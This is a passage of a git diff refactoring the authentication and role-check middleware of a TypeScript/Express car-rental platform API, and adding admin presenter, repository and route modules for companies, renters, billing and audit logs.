(const chunk of cookieHeader.split(';')) { + const [rawName, ...rawValue] = chunk.trim().split('=') + if (rawName === name) { + return decodeURIComponent(rawValue.join('=')) + } + } + + return null +} + +export function sendForbidden(res: Response, error: string, message: string, extra?: Record) { + return res.status(403).json({ error, message, statusCode: 403, ...extra }) +} + +export function sendPaymentRequired(res: Response, error: string, message: string, extra?: Record) { + return res.status(402).json({ error, message, statusCode: 402, ...extra }) +} diff --git a/apps/api/src/middleware/requireAdminAuth.ts b/apps/api/src/middleware/requireAdminAuth.ts index b932c69..f264342 100644 --- a/apps/api/src/middleware/requireAdminAuth.ts +++ b/apps/api/src/middleware/requireAdminAuth.ts @@ -2,6 +2,7 @@ import { Request, Response, NextFunction } from 'express' import jwt from 'jsonwebtoken' import { prisma } from '../lib/prisma' import { AdminRole } from '@rentaldrivego/database' +import { sendUnauthorized, sendForbidden } from './authHelpers' const ROLE_RANK: Record = { SUPER_ADMIN: 5, @@ -11,48 +12,52 @@ const ROLE_RANK: Record = { VIEWER: 1, } +/** + * Requires a valid admin Bearer token. + * + * Guarantees on success: + * req.admin — the full AdminUser record + */ export async function requireAdminAuth(req: Request, res: Response, next: NextFunction) { const authHeader = req.headers.authorization const token = authHeader?.startsWith('Bearer ') ? authHeader.slice(7) : null - if (!token) { - return res.status(401).json({ error: 'unauthenticated', message: 'Admin authentication required', statusCode: 401 }) - } + if (!token) return sendUnauthorized(res, 'unauthenticated', 'Admin authentication required') + let payload: { sub: string; type: string } try { - const payload = jwt.verify(token, process.env.JWT_SECRET!) as { sub: string; type: string } - if (payload.type !== 'admin') { - return res.status(401).json({ error: 'invalid_token', message: 'Invalid token type', statusCode: 401 }) - } - - const admin = await prisma.adminUser.findUnique({ where: { id: payload.sub } }) - if (!admin || !admin.isActive) { - return res.status(401).json({ error: 'unauthenticated', message: 'Admin account not found or deactivated', statusCode: 401 }) - } - - req.admin = admin - next() + payload = jwt.verify(token, process.env.JWT_SECRET!) as { sub: string; type: string } } catch { - return res.status(401).json({ error: 'invalid_token', message: 'Invalid or expired admin token', statusCode: 401 }) + return sendUnauthorized(res, 'invalid_token', 'Invalid or expired admin token') } + + if (payload.type !== 'admin') { + return sendUnauthorized(res, 'invalid_token', 'Invalid token type') + } + + const admin = await prisma.adminUser.findUnique({ where: { id: payload.sub } }) + if (!admin || !admin.isActive) { + return sendUnauthorized(res, 'unauthenticated', 'Admin account not found or deactivated') + } + + req.admin = admin + next() } +/** + * Requires the authenticated admin to have at least `minimumRole`. + * Must be applied after `requireAdminAuth`. + */ export function requireAdminRole(minimumRole: AdminRole) { return (req: Request, res: Response, next: NextFunction) => { const admin = req.admin - if (!admin) { - return res.status(401).json({ error: 'unauthenticated', message: 'Admin authentication required', statusCode: 401 }) - } + if (!admin) return sendUnauthorized(res, 'unauthenticated', 'Admin authentication required') - const rank = ROLE_RANK[admin.role] ?? 0 - const required = ROLE_RANK[minimumRole] ?? 99 + const rank = ROLE_RANK[admin.role] ?? 0 + const required = ROLE_RANK[minimumRole] ?? 99 if (rank < required) { - return res.status(403).json({ - error: 'forbidden', - message: `This action requires the ${minimumRole} role or higher`, - statusCode: 403, - }) + return sendForbidden(res, 'forbidden', `This action requires the ${minimumRole} role or higher`) } next() diff --git a/apps/api/src/middleware/requireCompanyAuth.ts b/apps/api/src/middleware/requireCompanyAuth.ts index 5e0e3c3..d46dfcc 100644 --- a/apps/api/src/middleware/requireCompanyAuth.ts +++ b/apps/api/src/middleware/requireCompanyAuth.ts @@ -1,45 +1,54 @@ import { Request, Response, NextFunction } from 'express' import jwt from 'jsonwebtoken' import { prisma } from '../lib/prisma' +import { getCookie, sendUnauthorized } from './authHelpers' + +/** + * Validates a company-scoped Bearer token and loads the employee + company onto `req`. + * + * Guarantees on success: + * req.employee — full employee record (with company relation) + * req.company — the employee's company + * req.companyId — string shorthand for req.company.id + */ +async function authenticateCompanyRequest(req: Request, res: Response, next: NextFunction, allowCookie = false) { + const authHeader = req.headers.authorization + const bearerToken = authHeader?.startsWith('Bearer ') ? authHeader.slice(7) : null + const cookieToken = allowCookie ? getCookie(req, 'employee_token') : null + const token = bearerToken ?? cookieToken + + if (!token) return sendUnauthorized(res, 'unauthenticated', 'Authentication required') + + let payload: { sub: string; type: string } + try { + payload = jwt.verify(token, process.env.JWT_SECRET!) as { sub: string; type: string } + } catch { + return sendUnauthorized(res, 'invalid_token', 'Invalid or expired session token') + } + + if (payload.type !== 'employee') { + return sendUnauthorized(res, 'invalid_token', 'Invalid token type for this endpoint') + } + + const employee = await prisma.employee.findUnique({ + where: { id: payload.sub }, + include: { company: true }, + }) + + if (!employee || !employee.isActive) { + return sendUnauthorized(res, 'unauthenticated', 'Employee account not found or inactive') + } + + req.employee = employee + req.company = employee.company + req.companyId = employee.companyId + next() +} export async function requireCompanyAuth(req: Request, res: Response, next: NextFunction) { - const authHeader = req.headers.authorization - const sessionToken = authHeader?.startsWith('Bearer ') ? authHeader.slice(7) : null - - if (!sessionToken) { - return res.status(401).json({ - error: 'unauthenticated', - message: 'Authentication required', - statusCode: 401, - }) - } - - try { - const payload = jwt.verify(sessionToken, process.env.JWT_SECRET!) as { sub: string; type: string } - if (payload.type === 'employee') { - const employee = await prisma.employee.findUnique({ - where: { id: payload.sub }, - include: { company: true }, - }) - - if (!employee || !employee.isActive) { - return res.status(401).json({ - error: 'unauthenticated', - message: 'Employee account not found or inactive', - statusCode: 401, - }) - } - - req.employee = employee - req.company = employee.company - req.companyId = employee.companyId - return next() - } - } catch { - return res.status(401).json({ - error: 'invalid_token', - message: 'Invalid or expired session token', - statusCode: 401, - }) - } + return authenticateCompanyRequest(req, res, next) +} + +export async function requireCompanyDocumentAuth(req: Request, res: Response, next: NextFunction) { + return authenticateCompanyRequest(req, res, next, true) } diff --git a/apps/api/src/middleware/requireRenterAuth.ts b/apps/api/src/middleware/requireRenterAuth.ts index a5f8f61..a166881 100644 --- a/apps/api/src/middleware/requireRenterAuth.ts +++ b/apps/api/src/middleware/requireRenterAuth.ts @@ -1,46 +1,57 @@ import { Request, Response, NextFunction } from 'express' import jwt from 'jsonwebtoken' import { prisma } from '../lib/prisma' +import { sendUnauthorized } from './authHelpers' +/** + * Requires a valid renter Bearer token. + * + * Guarantees on success: + * req.renterId — the authenticated renter's id + */ export async function requireRenterAuth(req: Request, res: Response, next: NextFunction) { const authHeader = req.headers.authorization const token = authHeader?.startsWith('Bearer ') ? authHeader.slice(7) : null - if (!token) { - return res.status(401).json({ error: 'unauthenticated', message: 'Renter authentication required', statusCode: 401 }) - } + if (!token) return sendUnauthorized(res, 'unauthenticated', 'Renter authentication required') + let payload: { sub: string; type: string } try { - const payload = jwt.verify(token, process.env.JWT_SECRET!) as { sub: string; type: string } - if (payload.type !== 'renter') { - return res.status(401).json({ error: 'invalid_token', message: 'Invalid token type', statusCode: 401 }) - } - - const renter = await prisma.renter.findUnique({ where: { id: payload.sub } }) - if (!renter || !renter.isActive) { - return res.status(401).json({ error: 'unauthenticated', message: 'Renter account not found or inactive', statusCode: 401 }) - } - - req.renterId = renter.id - next() + payload = jwt.verify(token, process.env.JWT_SECRET!) as { sub: string; type: string } } catch { - return res.status(401).json({ error: 'invalid_token', message: 'Invalid or expired token', statusCode: 401 }) + return sendUnauthorized(res, 'invalid_token', 'Invalid or expired token') } + + if (payload.type !== 'renter') { + return sendUnauthorized(res, 'invalid_token', 'Invalid token type') + } + + const renter = await prisma.renter.findUnique({ where: { id: payload.sub } }) + if (!renter || !renter.isActive) { + return sendUnauthorized(res, 'unauthenticated', 'Renter account not found or inactive') + } + + req.renterId = renter.id + next() } -export async function optionalRenterAuth(req: Request, res: Response, next: NextFunction) { +/** + * Optionally extracts renter identity from a Bearer token. + * Never blocks the request — invalid or absent tokens are silently ignored. + * + * Sets on success: + * req.renterId — the authenticated renter's id (if token is valid) + */ +export async function optionalRenterAuth(req: Request, _res: Response, next: NextFunction) { const authHeader = req.headers.authorization const token = authHeader?.startsWith('Bearer ') ? authHeader.slice(7) : null - if (!token) return next() try { const payload = jwt.verify(token, process.env.JWT_SECRET!) as { sub: string; type: string } - if (payload.type === 'renter') { - req.renterId = payload.sub - } + if (payload.type === 'renter') req.renterId = payload.sub } catch { - // Optional — ignore invalid tokens + // Optional — silently ignore invalid tokens } next() diff --git a/apps/api/src/middleware/requireRole.ts b/apps/api/src/middleware/requireRole.ts index 38defb4..bb0ef61 100644 --- a/apps/api/src/middleware/requireRole.ts +++ b/apps/api/src/middleware/requireRole.ts @@ -1,5 +1,6 @@ import { Request, Response, NextFunction } from 'express' import { EmployeeRole } from '@rentaldrivego/database' +import { sendUnauthorized, sendForbidden } from './authHelpers' const ROLE_RANK: Record = { OWNER: 3, @@ -7,21 +8,20 @@ const ROLE_RANK: Record = { AGENT: 1, } +/** + * Requires the authenticated employee to have at least `minimumRole`. + * Must be applied after `requireCompanyAuth`. + */ export function requireRole(minimumRole: EmployeeRole) { return (req: Request, res: Response, next: NextFunction) => { const employee = req.employee - if (!employee) { - return res.status(401).json({ error: 'unauthenticated', message: 'Authentication required', statusCode: 401 }) - } + if (!employee) return sendUnauthorized(res, 'unauthenticated', 'Authentication required') const employeeRank = ROLE_RANK[employee.role] ?? 0 - const requiredRank = ROLE_RANK[minimumRole] ?? 99 + const requiredRank = ROLE_RANK[minimumRole] ?? 99 if (employeeRank < requiredRank) { - return res.status(403).json({ - error: 'forbidden', - message: `This action requires the ${minimumRole} role or higher`, - statusCode: 403, + return sendForbidden(res, 'forbidden', `This action requires the ${minimumRole} role or higher`, { requiredRole: minimumRole, yourRole: employee.role, }) diff --git a/apps/api/src/middleware/requireSubscription.ts b/apps/api/src/middleware/requireSubscription.ts index 7d380ee..fabce45 100644 --- a/apps/api/src/middleware/requireSubscription.ts +++ b/apps/api/src/middleware/requireSubscription.ts @@ -1,23 +1,28 @@ import { Request, Response, NextFunction } from 'express' +import { sendUnauthorized, sendPaymentRequired } from './authHelpers' const BLOCKED_STATUSES = ['SUSPENDED', 'PENDING'] +/** + * Blocks requests for companies with lapsed or unactivated subscriptions. + * Must be applied after `requireTenant`. + * + * Guarantees on success: + * req.company.status is not SUSPENDED or PENDING + */ export function requireSubscription(req: Request, res: Response, next: NextFunction) { const company = req.company - if (!company) { - return res.status(401).json({ error: 'unauthenticated', message: 'No company context', statusCode: 401 }) - } + if (!company) return sendUnauthorized(res, 'unauthenticated', 'No company context') if (BLOCKED_STATUSES.includes(company.status)) { - return res.status(402).json({ - error: 'subscription_' + company.status.toLowerCase(), - message: - company.status === 'SUSPENDED' - ? 'Your account has been suspended. Please contact support or renew your subscription.' - : 'Your account is pending activation. Please complete your subscription setup.', - statusCode: 402, - billingUrl: `${process.env.NEXT_PUBLIC_DASHBOARD_URL}/billing`, - }) + return sendPaymentRequired( + res, + `subscription_${company.status.toLowerCase()}`, + company.status === 'SUSPENDED' + ? 'Your account has been suspended. Please contact support or renew your subscription.' + : 'Your account is pending activation. Please complete your subscription setup.', + { billingUrl: `${process.env.NEXT_PUBLIC_DASHBOARD_URL}/billing` }, + ) } next() diff --git a/apps/api/src/middleware/requireTenant.ts b/apps/api/src/middleware/requireTenant.ts index 14482a2..7804df8 100644 --- a/apps/api/src/middleware/requireTenant.ts +++ b/apps/api/src/middleware/requireTenant.ts @@ -1,22 +1,23 @@ import { Request, Response, NextFunction } from 'express' import { prisma } from '../lib/prisma' +import { sendUnauthorized } from './authHelpers' +/** + * Loads the company record and validates it exists. + * Must be applied after `requireCompanyAuth`. + * + * Guarantees on success: + * req.company — full Company record + * req.companyId — string id (already set by requireCompanyAuth) + */ export async function requireTenant(req: Request, res: Response, next: NextFunction) { if (!req.companyId) { - return res.status(401).json({ - error: 'unauthenticated', - message: 'Tenant context missing — requireCompanyAuth must run first', - statusCode: 401, - }) + return sendUnauthorized(res, 'unauthenticated', 'Tenant context missing — requireCompanyAuth must run first') } const company = await prisma.company.findUnique({ where: { id: req.companyId } }) if (!company) { - return res.status(401).json({ - error: 'company_not_found', - message: 'Company not found', - statusCode: 401, - }) + return sendUnauthorized(res, 'company_not_found', 'Company not found') } req.company = company diff --git a/apps/api/src/modules/admin/admin.presenter.ts b/apps/api/src/modules/admin/admin.presenter.ts new file mode 100644 index 0000000..f9d6e0d --- /dev/null +++ b/apps/api/src/modules/admin/admin.presenter.ts @@ -0,0 +1,28 @@ +export function presentAdminUser>(admin: T) { + const { passwordHash, totpSecret, ...safe } = admin + return safe +} + +export function presentAdminSession>(admin: T, token: string) { + return { + token, + admin: presentAdminUser(admin), + } +} + +export function presentPaginated( + data: T[], + total: number, + page: number, + pageSize: number, + extra: Record = {}, +) { + return { + data, + total, + page, + pageSize, + totalPages: Math.ceil(total / pageSize), + ...extra, + } +} diff --git a/apps/api/src/modules/admin/admin.repo.ts b/apps/api/src/modules/admin/admin.repo.ts new file mode 100644 index 0000000..46258d1 --- /dev/null +++ b/apps/api/src/modules/admin/admin.repo.ts @@ -0,0 +1,400 @@ +import { prisma } from '../../lib/prisma' + +const companyListInclude = { + brand: { select: { displayName: true, logoUrl: true, subdomain: true } }, + subscription: { select: { plan: true, status: true } }, + _count: { select: { employees: true, vehicles: true } }, +} as const + +const companyDetailInclude = { + brand: true, + contractSettings: true, + accountingSettings: true, + subscription: { include: { invoices: { orderBy: { createdAt: 'desc' }, take: 10 } } }, + employees: true, + _count: { select: { employees: true, vehicles: true, customers: true, reservations: true } }, +} as const + +const billingInclude = { + company: { select: { id: true, name: true, email: true, slug: true, status: true } }, + invoices: { + select: { id: true, amount: true, currency: true, status: true, paidAt: true, createdAt: true }, + orderBy: { createdAt: 'desc' }, + take: 5, + }, + _count: { select: { invoices: true } }, +} as const + +function parseOptionalDate(value?: string | null) { + if (!value) return null + return new Date(value) +} + +export function findAdminByEmail(email: string) { + return prisma.adminUser.findUnique({ where: { email } }) +} + +export function findAdminByIdOrThrow(id: string) { + return prisma.adminUser.findUniqueOrThrow({ where: { id } }) +} + +export function updateAdminLastLogin(id: string) { + return prisma.adminUser.update({ where: { id }, data: { lastLoginAt: new Date() } }) +} + +export function updateAdminTotpSecret(id: string, secret: string) { + return prisma.adminUser.update({ where: { id }, data: { totpSecret: secret } }) +} + +export function enableAdminTotp(id: string) { + return prisma.adminUser.update({ where: { id }, data: { totpEnabled: true } }) +} + +export function setAdminPasswordReset(id: string, token: string, expiresAt: Date) { + return prisma.adminUser.update({ + where: { id }, + data: { passwordResetToken: token, passwordResetExpiresAt: expiresAt }, + }) +} + +export function findAdminByResetToken(token: string) { + return prisma.adminUser.findFirst({ + where: { + passwordResetToken: token, + passwordResetExpiresAt: { gt: new Date() }, + }, + }) +} + +export function updateAdminPassword(id: string, passwordHash: string) { + return prisma.adminUser.update({ + where: { id }, + data: { + passwordHash, + passwordResetToken: null, + passwordResetExpiresAt: null, + }, + }) +} + +export function createAuditLog(data: Record) { + return prisma.auditLog.create({ data: data as any }) +} + +export async function listCompaniesPage(query: { q?: string; status?: string; plan?: string; page: number; pageSize: number }) { + const where: any = {} + if (query.status) where.status = query.status + if (query.q) { + where.OR = [ + { name: { contains: query.q, mode: 'insensitive' } }, + { email: { contains: query.q, mode: 'insensitive' } }, + { slug: { contains: query.q, mode: 'insensitive' } }, + ] + } + if (query.plan) where.subscription = { plan: query.plan } + + const [data, total] = await Promise.all([ + prisma.company.findMany({ + where, + include: companyListInclude, + skip: (query.page - 1) * query.pageSize, + take: query.pageSize, + orderBy: { createdAt: 'desc' }, + }), + prisma.company.count({ where }), + ]) + + return { data, total } +} + +export function getCompanyDetail(id: string) { + return prisma.company.findUniqueOrThrow({ where: { id }, include: companyDetailInclude }) +} + +export function getCompanyUpdateSnapshot(id: string) { + return prisma.company.findUniqueOrThrow({ + where: { id }, + include: { brand: true, contractSettings: true, accountingSettings: true, subscription: true }, + }) +} + +export async function applyCompanyUpdate(id: string, body: any, current: { name: string; slug: string; brand?: { paymentMethodsEnabled?: any[] | null } | null }) { + return prisma.$transaction(async (tx) => { + if (body.company) await tx.company.update({ where: { id }, data: body.company }) + + if (body.subscription) { + const sub = body.subscription + await tx.subscription.upsert({ + where: { companyId: id }, + update: { + ...sub, + trialStartAt: parseOptionalDate(sub.trialStartAt), + trialEndAt: parseOptionalDate(sub.trialEndAt), + currentPeriodStart: parseOptionalDate(sub.currentPeriodStart), + currentPeriodEnd: parseOptionalDate(sub.currentPeriodEnd), + cancelledAt: parseOptionalDate(sub.cancelledAt), + }, + create: { + companyId: id, + plan: sub.plan ?? 'STARTER', + billingPeriod: sub.billingPeriod ?? 'MONTHLY', + status: sub.status ?? 'TRIALING', + currency: sub.currency ?? 'MAD', + trialStartAt: parseOptionalDate(sub.trialStartAt), + trialEndAt: parseOptionalDate(sub.trialEndAt), + currentPeriodStart: parseOptionalDate(sub.currentPeriodStart), + currentPeriodEnd: parseOptionalDate(sub.currentPeriodEnd), + cancelledAt: parseOptionalDate(sub.cancelledAt), + cancelAtPeriodEnd: sub.cancelAtPeriodEnd ?? false, + } as any, + }) + } + + if (body.brand) { + await tx.brandSettings.upsert({ + where: { companyId: id }, + update: body.brand, + create: { + companyId: id, + displayName: body.brand.displayName ?? current.name, + subdomain: body.brand.subdomain ?? current.slug, + paymentMethodsEnabled: current.brand?.paymentMethodsEnabled ?? [], + ...body.brand, + } as any, + }) + } + + if (body.contractSettings) { + await tx.contractSettings.upsert({ + where: { companyId: id }, + update: body.contractSettings, + create: { companyId: id, ...body.contractSettings } as any, + }) + } + + if (body.accountingSettings) { + await tx.accountingSettings.upsert({ + where: { companyId: id }, + update: body.accountingSettings, + create: { companyId: id, ...body.accountingSettings } as any, + }) + } + + return tx.company.findUniqueOrThrow({ where: { id }, include: companyDetailInclude }) + }) +} + +export function updateCompanyStatus(id: string, status: string) { + return prisma.company.update({ where: { id }, data: { status: status as any } }) +} + +export function deleteCompany(id: string) { + return prisma.company.delete({ where: { id } }) +} + +export function getCompanyForImpersonation(id: string) { + return prisma.company.findUniqueOrThrow({ + where: { id }, + include: { employees: { where: { role: 'OWNER' } } }, + }) +} + +export async function listRentersPage(query: { q?: string; blocked?: string; page: number; pageSize: number }) { + const where: any = {} + if (query.blocked !== undefined) where.isActive = query.blocked === 'false' + if (query.q) { + where.OR = [ + { firstName: { contains: query.q, mode: 'insensitive' } }, + { email: { contains: query.q, mode: 'insensitive' } }, + ] + } + + const [data, total] = await Promise.all([ + prisma.renter.findMany({ + where, + select: { + id: true, + firstName: true, + lastName: true, + email: true, + phone: true, + isActive: true, + createdAt: true, + _count: { select: { reservations: true } }, + }, + skip: (query.page - 1) * query.pageSize, + take: query.pageSize, + orderBy: { createdAt: 'desc' }, + }), + prisma.renter.count({ where }), + ]) + + return { data, total } +} + +export function updateRenterActive(id: string, isActive: boolean) { + return prisma.renter.update({ where: { id }, data: { isActive } }) +} + +export async function getPlatformMetricCounts() { + const [ + totalCompanies, + activeCompanies, + trialingCompanies, + suspendedCompanies, + totalRenters, + totalReservations, + ] = await Promise.all([ + prisma.company.count(), + prisma.company.count({ where: { status: 'ACTIVE' } }), + prisma.company.count({ where: { status: 'TRIALING' } }), + prisma.company.count({ where: { status: 'SUSPENDED' } }), + prisma.renter.count(), + prisma.reservation.count(), + ]) + + return { + totalCompanies, + activeCompanies, + trialingCompanies, + suspendedCompanies, + totalRenters, + totalReservations, + } +} + +export async function listAuditLogsPage(query: { adminId?: string; action?: string; companyId?: string; entityId?: string; page: number; pageSize: number }) { + const where: any = {} + if (query.adminId) where.adminUserId = query.adminId + if (query.action) where.action = { contains: query.action } + if (query.companyId) where.companyId = query.companyId + if (query.entityId) where.resourceId = query.entityId + + const [data, total] = await Promise.all([ + prisma.auditLog.findMany({ + where, + include: { adminUser: { select: { firstName: true, lastName: true, email: true } } }, + skip: (query.page - 1) * query.pageSize, + take: query.pageSize, + orderBy: { createdAt: 'desc' }, + }), + prisma.auditLog.count({ where }), + ]) + + return { data, total } +} + +export function listAdmins() { + return prisma.adminUser.findMany({ + include: { permissions: true }, + }) +} + +export function createAdmin(data: { + email: string + firstName: string + lastName: string + role: string + passwordHash: string + permissions?: any[] +}) { + return prisma.adminUser.create({ + data: { + email: data.email, + firstName: data.firstName, + lastName: data.lastName, + role: data.role as any, + passwordHash: data.passwordHash, + permissions: data.permissions ? { create: data.permissions } : undefined, + }, + include: { permissions: true }, + }) +} + +export function updateAdminRole(id: string, role: string) { + return prisma.adminUser.update({ where: { id }, data: { role: role as any } }) +} + +export async function replaceAdminPermissions(id: string, permissions: any[]) { + await prisma.adminUser.findUniqueOrThrow({ where: { id } }) + await prisma.$transaction([ + prisma.adminPermission.deleteMany({ where: { adminUserId: id } }), + prisma.adminPermission.createMany({ + data: permissions.map((permission) => ({ + adminUserId: id, + resource: permission.resource, + actions: permission.actions, + })) as any, + }), + ]) + return prisma.adminUser.findUniqueOrThrow({ where: { id }, include: { permissions: true } }) +} + +export async function listBillingPage(query: { status?: string; plan?: string; page: number; pageSize: number }) { + const where: any = {} + if (query.status) where.status = query.status + if (query.plan) where.plan = query.plan + + const [data, total] = await Promise.all([ + prisma.subscription.findMany({ + where, + include: billingInclude, + skip: (query.page - 1) * query.pageSize, + take: query.pageSize, + orderBy: { createdAt: 'desc' }, + }), + prisma.subscription.count({ where }), + ]) + + return { data, total } +} + +export function listActiveSubscriptionsForMrr() { + return prisma.subscription.findMany({ + where: { status: { in: ['ACTIVE', 'TRIALING'] as any[] } }, + select: { plan: true, billingPeriod: true }, + }) +} + +export async function getBillingStatusCounts() { + const [activeCount, trialingCount, pastDueCount, cancelledCount] = await Promise.all([ + prisma.subscription.count({ where: { status: 'ACTIVE' } }), + prisma.subscription.count({ where: { status: 'TRIALING' } }), + prisma.subscription.count({ where: { status: 'PAST_DUE' } }), + prisma.subscription.count({ where: { status: 'CANCELLED' } }), + ]) + + return { activeCount, trialingCount, pastDueCount, cancelledCount } +} + +export async function listCompanyInvoicesPage(companyId: string, query: { page: number; pageSize: number }) { + const [data, total] = await Promise.all([ + prisma.subscriptionInvoice.findMany({ + where: { companyId }, + orderBy: { createdAt: 'desc' }, + skip: (query.page - 1) * query.pageSize, + take: query.pageSize, + }), + prisma.subscriptionInvoice.count({ where: { companyId } }), + ]) + + return { data, total } +} + +export function getInvoicePdfRecord(invoiceId: string) { + return prisma.subscriptionInvoice.findUniqueOrThrow({ + where: { id: invoiceId }, + include: { + company: { select: { name: true, email: true, phone: true, address: true } }, + subscription: { + select: { + plan: true, + billingPeriod: true, + currency: true, + currentPeriodStart: true, + currentPeriodEnd: true, + }, + }, + }, + }) +} diff --git a/apps/api/src/modules/admin/admin.routes.ts b/apps/api/src/modules/admin/admin.routes.ts new file mode 100644 index 0000000..641c3b5 --- /dev/null +++ b/apps/api/src/modules/admin/admin.routes.ts @@ -0,0 +1,226 @@ +import { Router } from 'express' +import { requireAdminAuth, requireAdminRole } from '../../middleware/requireAdminAuth' +import { parseBody, parseQuery, parseParams } from '../../http/validate' +import { ok, created } from '../../http/respond' +import * as service from './admin.service' +import { presentAdminUser } from './admin.presenter' +import { + loginSchema, forgotPasswordSchema, resetPasswordSchema, totpVerifySchema, + companiesQuerySchema, rentersQuerySchema, auditLogQuerySchema, billingQuerySchema, + invoicesQuerySchema, adminCompanyUpdateSchema, companyStatusSchema, + createAdminSchema, adminRoleSchema, adminPermissionsSchema, + homepageUpdateSchema, idParamSchema, companyIdParamSchema, invoiceIdParamSchema, +} from './admin.schemas' + +const router = Router() + +// ─── Auth (public) ───────────────────────────────────────────── + +router.post('/auth/login', async (req, res, next) => { + try { + const { email, password, totpCode } = parseBody(loginSchema, req) + const result = await service.login(email, password, totpCode) + if (!result) return res.status(401).json({ error: 'invalid_credentials', message: 'Invalid email or password', statusCode: 401 }) + if ('totpRequired' in result) return res.status(401).json({ error: 'totp_required', message: '2FA code required', statusCode: 401 }) + if ('invalidTotp' in result) return res.status(401).json({ error: 'invalid_totp', message: 'Invalid 2FA code', statusCode: 401 }) + ok(res, { data: result }) + } catch (err) { next(err) } +}) + +router.post('/auth/forgot-password', async (req, res, next) => { + try { + const { email } = parseBody(forgotPasswordSchema, req) + await service.forgotPassword(email) + ok(res, { data: { message: 'If that email is registered, a reset link has been sent.' } }) + } catch (err) { next(err) } +}) + +router.post('/auth/reset-password', async (req, res, next) => { + try { + const { token, password } = parseBody(resetPasswordSchema, req) + const ok2 = await service.resetPassword(token, password) + if (!ok2) return res.status(400).json({ error: 'invalid_token', message: 'Reset link is invalid or has expired.', statusCode: 400 }) + ok(res, { data: { message: 'Password updated successfully. You can now sign in.' } }) + } catch (err) { next(err) } +}) + +// ─── Auth (protected) ────────────────────────────────────────── + +router.get('/auth/me', requireAdminAuth, (req, res) => { + ok(res, { data: presentAdminUser(req.admin as any) }) +}) + +router.post('/auth/2fa/setup', requireAdminAuth, async (req, res, next) => { + try { + ok(res, { data: await service.setupTotp(req.admin.id, req.admin.email) }) + } catch (err) { next(err) } +}) + +router.post('/auth/2fa/verify', requireAdminAuth, async (req, res, next) => { + try { + const { code } = parseBody(totpVerifySchema, req) + const valid = await service.verifyTotp(req.admin.id, code) + if (!valid) return res.status(400).json({ error: 'invalid_code', message: 'Invalid 2FA code', statusCode: 400 }) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +// ─── Companies ───────────────────────────────────────────────── + +router.get('/companies', requireAdminAuth, async (req, res, next) => { + try { + ok(res, await service.listCompanies(parseQuery(companiesQuerySchema, req))) + } catch (err) { next(err) } +}) + +router.get('/companies/:id', requireAdminAuth, async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + ok(res, { data: await service.getCompany(id) }) + } catch (err) { next(err) } +}) + +router.patch('/companies/:id', requireAdminAuth, requireAdminRole('SUPPORT'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const body = parseBody(adminCompanyUpdateSchema, req) + ok(res, { data: await service.updateCompany(id, body, req.admin.id, req.ip) }) + } catch (err) { next(err) } +}) + +router.patch('/companies/:id/status', requireAdminAuth, requireAdminRole('SUPPORT'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { status, reason } = parseBody(companyStatusSchema, req) + ok(res, { data: await service.setCompanyStatus(id, status, reason, req.admin.id, req.ip) }) + } catch (err) { next(err) } +}) + +router.delete('/companies/:id', requireAdminAuth, requireAdminRole('ADMIN'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.deleteCompany(id, req.admin.id, req.ip) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +router.post('/companies/:id/impersonate', requireAdminAuth, requireAdminRole('ADMIN'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + ok(res, { data: await service.impersonateCompany(id, req.admin.id, req.ip) }) + } catch (err) { next(err) } +}) + +// ─── Renters ─────────────────────────────────────────────────── + +router.get('/renters', requireAdminAuth, async (req, res, next) => { + try { + ok(res, await service.listRenters(parseQuery(rentersQuerySchema, req))) + } catch (err) { next(err) } +}) + +router.post('/renters/:id/block', requireAdminAuth, requireAdminRole('SUPPORT'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.setRenterActive(id, false) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +router.post('/renters/:id/unblock', requireAdminAuth, requireAdminRole('SUPPORT'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.setRenterActive(id, true) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +// ─── Metrics ─────────────────────────────────────────────────── + +router.get('/metrics', requireAdminAuth, requireAdminRole('FINANCE'), async (req, res, next) => { + try { + ok(res, { data: await service.getPlatformMetrics() }) + } catch (err) { next(err) } +}) + +// ─── Audit logs ──────────────────────────────────────────────── + +router.get('/audit-logs', requireAdminAuth, requireAdminRole('ADMIN'), async (req, res, next) => { + try { + ok(res, await service.getAuditLogs(parseQuery(auditLogQuerySchema, req))) + } catch (err) { next(err) } +}) + +// ─── Admin users ─────────────────────────────────────────────── + +router.get('/admins', requireAdminAuth, requireAdminRole('SUPER_ADMIN'), async (req, res, next) => { + try { + ok(res, { data: await service.listAdmins() }) + } catch (err) { next(err) } +}) + +router.post('/admins', requireAdminAuth, requireAdminRole('SUPER_ADMIN'), async (req, res, next) => { + try { + created(res, { data: await service.createAdmin(parseBody(createAdminSchema, req)) }) + } catch (err) { next(err) } +}) + +router.patch('/admins/:id/role', requireAdminAuth, requireAdminRole('SUPER_ADMIN'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { role } = parseBody(adminRoleSchema, req) + await service.updateAdminRole(id, role) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +router.patch('/admins/:id/permissions', requireAdminAuth, requireAdminRole('SUPER_ADMIN'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { permissions } = parseBody(adminPermissionsSchema, req) + ok(res, { data: await service.updateAdminPermissions(id, permissions) }) + } catch (err) { next(err) } +}) + +// ─── Billing ─────────────────────────────────────────────────── + +router.get('/billing', requireAdminAuth, requireAdminRole('FINANCE'), async (req, res, next) => { + try { + ok(res, await service.getBilling(parseQuery(billingQuerySchema, req))) + } catch (err) { next(err) } +}) + +router.get('/billing/:companyId/invoices', requireAdminAuth, requireAdminRole('FINANCE'), async (req, res, next) => { + try { + const { companyId } = parseParams(companyIdParamSchema, req) + ok(res, await service.getCompanyInvoices(companyId, parseQuery(invoicesQuerySchema, req))) + } catch (err) { next(err) } +}) + +router.get('/billing/invoices/:invoiceId/pdf', requireAdminAuth, requireAdminRole('FINANCE'), async (req, res, next) => { + try { + const { invoiceId } = parseParams(invoiceIdParamSchema, req) + const { pdfBuffer, invoiceNumber } = await service.getInvoicePdf(invoiceId) + res.setHeader('Content-Type', 